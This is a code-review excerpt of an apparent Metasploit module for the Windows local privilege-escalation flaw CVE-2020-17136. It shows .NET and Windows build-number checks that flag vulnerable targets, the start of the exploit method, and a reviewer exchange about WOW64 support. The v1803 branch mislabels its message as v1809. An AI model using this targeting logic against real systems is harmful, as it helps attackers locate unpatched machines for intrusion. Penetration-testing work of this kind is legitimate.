modules/exploits/windows/local/cve_2020_17136.rb

```diff
@@ -0,0 +1,323 @@
+    'v2.0.50727'
+  end
+
+  def check_requirements(clr_req, installed_dotnet_versions)
+    installed_dotnet_versions.each do |fi|
+      if clr_req == 'v4.0.30319'
+        if fi[0] == '4'
+          vprint_status('Requirements ok')
+          return true
+        end
+      elsif fi[0] == '3'
+        vprint_status('Requirements ok')
+        return true
+      end
+    end
+    print_error('Required dotnet version not present')
+    false
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+
+    if sysinfo_value !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
+    end
+
+    build_num_raw = cmd_exec('cmd.exe /c ver')
+    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
+    if build_num.nil?
+      return CheckCode::Unknown("Couldn't retrieve the target's build number!")
+    else
+      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
+      vprint_status("Target's build number: #{build_num}")
+    end
+
+    build_num_gemversion = Gem::Version.new(build_num)
+    # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
+    if (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2
+      return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
+      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909
+      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903
+      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809
+      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803
+      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
+    else
+      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
+    end
+  end
+
+  def exploit
+    if sysinfo['Architecture'] != 'x64'
+      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
+    end
```

Comment:
You probably want to account for running in a WOW64 context too.

Reply:
Thought this was doing this by preventing our exploit from being run under WOW64 as this has not been tested yet? Are you suggesting the exploit should be configured to also run on WOW64? Little confused what you want changed here and need a bit more clarity.